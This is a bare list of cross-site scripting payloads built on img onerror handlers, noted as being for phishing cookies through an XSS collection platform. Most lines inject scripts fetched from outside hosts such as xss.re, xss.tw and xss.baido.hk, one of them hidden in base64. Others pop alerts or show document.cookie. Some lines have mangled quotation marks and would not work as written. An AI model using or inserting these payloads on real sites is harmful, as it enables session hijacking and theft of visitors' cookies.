<img src='non-exist.jpg'onerror="alert('xss')">
<img src=# onerror=alert(123)>
<img src=# onerror=alert(document.cookie)>
The following use a platform to phish for cookies:
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
<img src="#">
<img src="#">
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
<img src=x width="0" height="0"></img>
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>